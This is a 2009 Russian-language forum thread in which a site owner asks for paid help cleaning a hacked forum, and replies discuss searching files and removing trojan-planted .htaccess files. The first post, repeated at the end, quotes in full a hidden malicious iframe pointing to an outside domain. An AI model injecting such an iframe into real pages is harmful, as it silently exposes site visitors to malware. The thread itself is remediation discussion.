Опубликовано: 3 августа 200916 г Форум был атакован спамерами, теперь в админцентре перебрасывает на ask.comНужно: проверить ВСЕ файлы на ftp на наличие в конце строки:<iframe src="http://q1f.ru:8080/index.php" width=144 height=111 style="visibility: hidden"></iframe>Удалить её.Оплата по договорённости.Писать: 829267 Изменено 3 августа 200916 г пользователем absurdum
Опубликовано: 21 августа 200916 г А почему вы просто не скопируете все файлы сайта по ftp на свой компьютер и не зададите поиск в far определенного словосочетания или кода?
Опубликовано: 21 августа 200916 г По-видимому, это вы мне писали на почту. Если нет — троян, вероятно, напхал вам в каждую директорию .htaccess файлов, фильтрующих определённую подстроку в GET-запросе. Удалите их и почти всё будет о'кей. Zero108, это лишнее — проще сразу поискать на сервере. Есть масса решений, я в своё время просто скрипт написал — можно невозбранно пользоваться. :huh:
Опубликовано: 21 августа 200916 г Zero108, это лишнее — проще сразу поискать на сервере. Есть масса решений, я в своё время просто скрипт написал — можно невозбранно пользоваться. :huh: Хороший скрипт только требует аккуратного обращения иначе можно весь форум себе продырявить)))))
Опубликовано: 24 августа 200916 г Хороший скрипт только требует аккуратного обращения иначе можно весь форум себе продырявить))))) $autocure = false by defaults, остальное на страх и риск, да. Впрочем, замечание верное — добавлю в текст предупреждение. :(
Форум был атакован спамерами, теперь в админцентре перебрасывает на ask.com
Нужно: проверить ВСЕ файлы на ftp на наличие в конце строки:
<iframe src="http://q1f.ru:8080/index.php" width=144 height=111 style="visibility: hidden"></iframe>
Удалить её.
Оплата по договорённости.
Писать: 829267
Изменено пользователем absurdum